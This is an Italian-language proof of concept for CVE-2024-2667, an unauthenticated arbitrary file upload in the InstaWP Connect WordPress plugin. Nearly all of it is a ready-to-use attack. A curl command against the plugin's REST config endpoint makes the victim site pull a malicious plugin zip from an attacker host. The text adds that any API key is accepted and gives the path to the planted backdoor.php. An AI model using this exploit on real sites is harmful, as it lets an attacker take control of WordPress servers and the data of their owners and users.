
Questa è una POC per CVE-2024-2667 (InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - Caricamento arbitrario di file non autenticato)
curl --data "api_key=123&override_plugin_zip=http://attacker-domain/malicious-plugin.zip" "http://victim-domain/?rest_route=/instawp-connect/v1/config"
api_key -> Puoi usare qualsiasi chiave API valida o non valida.
override_plugin_zip -> Percorso del file zip che contiene un plugin WordPress dannoso con una backdoor.
Una volta importato, puoi accedere alla backdoor tramite http://victim-domain/wp-content/plugins/malicious-plugin/backdoor.php (supponendo che il nome della directory sia malicious-plugin e che backdoor.php si trovi in quella directory)
Riferimenti: